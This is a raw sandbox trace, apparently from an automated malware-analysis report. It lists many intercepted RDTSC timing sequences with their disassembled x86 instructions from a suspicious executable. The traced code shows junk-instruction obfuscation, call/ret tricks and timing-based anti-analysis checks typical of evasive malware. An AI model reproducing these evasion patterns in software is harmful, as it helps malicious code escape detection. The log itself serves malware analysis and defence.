Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123CB70 second address: 123CB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD63248h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123CB8D second address: 123CB92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 123CB92 second address: 123CB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1240225 second address: 124022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124022B second address: 1240232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124326D second address: 1243271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1243271 second address: 1243277 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1243277 second address: 124328E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C1CD20402h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1243406 second address: 124345A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F8C1CD63245h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jc 00007F8C1CD63242h 0x00000018 jnc 00007F8C1CD6323Ch 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007F8C1CD63245h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124345A second address: 1243461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124351F second address: 1071BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 add dword ptr [esp], 2ACDA22Ch 0x0000000b jmp 00007F8C1CD63240h 0x00000010 push dword ptr [ebp+129C0309h] 0x00000016 pushad 0x00000017 mov cx, si 0x0000001a popad 0x0000001b call dword ptr [ebp+129C1852h] 0x00000021 pushad 0x00000022 jmp 00007F8C1CD6323Ah 0x00000027 xor eax, eax 0x00000029 mov dword ptr [ebp+129C1901h], eax 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 pushad 0x00000034 sub esi, 106691CAh 0x0000003a jo 00007F8C1CD6323Bh 0x00000040 or bx, C515h 0x00000045 popad 0x00000046 mov dword ptr [ebp+129C39B4h], eax 0x0000004c pushad 0x0000004d mov al, E6h 0x0000004f mov si, 3AD4h 0x00000053 popad 0x00000054 mov esi, 0000003Ch 0x00000059 jmp 00007F8C1CD6323Fh 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 mov edx, dword ptr [ebp+129C37C4h] 0x00000069 mov dword ptr [ebp+129C2973h], edx 0x0000006f popad 0x00000070 lodsw 0x00000072 stc 0x00000073 jmp 00007F8C1CD6323Fh 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c jmp 00007F8C1CD63242h 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 jno 00007F8C1CD6323Ch 0x0000008b nop 0x0000008c jmp 00007F8C1CD63249h 0x00000091 push eax 0x00000092 pushad 0x00000093 jno 00007F8C1CD6323Ch 0x00000099 push edx 0x0000009a push eax 0x0000009b push edx 0x0000009c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124962D second address: 124963B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C1CD203F6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124963B second address: 1249641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1248288 second address: 12482A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD20400h 0x00000009 jnc 00007F8C1CD203F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12482A2 second address: 12482AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124885C second address: 1248882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8C1CD2040Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1248A05 second address: 1248A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C1CD63236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1248A0F second address: 1248A19 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C1CD203F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1248A19 second address: 1248A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1248A1F second address: 1248A3A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8C1CD20406h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1248A3A second address: 1248A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 je 00007F8C1CD63236h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F8C1CD63236h 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1249115 second address: 124913A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C1CD20405h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1249498 second address: 12494AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F8C1CD63236h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12494AD second address: 12494B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12494B1 second address: 12494B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12494B7 second address: 12494BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124EC0F second address: 124EC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124EC15 second address: 124EC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124DAA1 second address: 124DAA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124DAA7 second address: 124DABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C1CD20401h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124D759 second address: 124D75D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124D75D second address: 124D763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124D763 second address: 124D77F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C1CD63247h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124D77F second address: 124D785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124D785 second address: 124D7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8C1CD63245h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124D7A9 second address: 124D7B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124D7B1 second address: 124D7CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F8C1CD6323Dh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnc 00007F8C1CD63236h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 121DD0F second address: 121DD13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124E530 second address: 124E548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124E548 second address: 124E54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124E54C second address: 124E571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F8C1CD63236h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124E571 second address: 124E575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124E575 second address: 124E57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 124E6B9 second address: 124E6C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 125476A second address: 1254782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD63244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253145 second address: 1253149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253267 second address: 125328D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C1CD63248h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 125328D second address: 1253292 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 125355A second address: 1253564 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C1CD6323Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12536C6 second address: 12536CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253B59 second address: 1253B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253B5D second address: 1253B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253B61 second address: 1253B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253CC7 second address: 1253CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253CCB second address: 1253CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C1CD63244h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253CE5 second address: 1253D04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20408h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253D04 second address: 1253D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8C1CD63236h 0x0000000a jmp 00007F8C1CD63241h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jl 00007F8C1CD63289h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8C1CD63243h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253D3D second address: 1253D55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20404h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253D55 second address: 1253D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8C1CD63246h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253EA2 second address: 1253ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD20409h 0x00000009 jmp 00007F8C1CD20404h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253ED8 second address: 1253EF3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C1CD63241h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1253EF3 second address: 1253EFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1200A9D second address: 1200AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C1CD63245h 0x0000000c jmp 00007F8C1CD6323Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11D50E8 second address: 11D50EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11D50EC second address: 11D50F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12545D1 second address: 125460C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD20405h 0x00000009 popad 0x0000000a jmp 00007F8C1CD20409h 0x0000000f jg 00007F8C1CD203FEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1252E5D second address: 1252E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1252E67 second address: 1252E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1252E6F second address: 1252E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122270B second address: 122277B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F8C1CD203F8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+12B744EAh] 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F8C1CD203F8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 or dword ptr [ebp+129C2694h], ebx 0x0000004d mov dx, si 0x00000050 nop 0x00000051 push eax 0x00000052 push edx 0x00000053 push edi 0x00000054 jmp 00007F8C1CD203FEh 0x00000059 pop edi 0x0000005a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 122277B second address: 1222782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222CC4 second address: 1222CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222CC8 second address: 1222CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F8C1CD6323Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222DA2 second address: 1222DEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7E158194h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F8C1CD203F8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 jmp 00007F8C1CD203FBh 0x0000002e call 00007F8C1CD203F9h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222DEF second address: 1222DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222DF3 second address: 1222DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222DF9 second address: 1222DFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222DFE second address: 1222E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222E04 second address: 1222E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8C1CD6323Ah 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 pushad 0x00000017 jmp 00007F8C1CD63248h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222E3A second address: 1222E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C1CD203FBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222FB6 second address: 1222FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222FBA second address: 1222FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222FC0 second address: 1222FE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63243h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c mov dx, ax 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222FE4 second address: 1222FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222FE8 second address: 1222FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222FEC second address: 1222FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222FF2 second address: 1222FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8C1CD63236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1222FFC second address: 1223000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
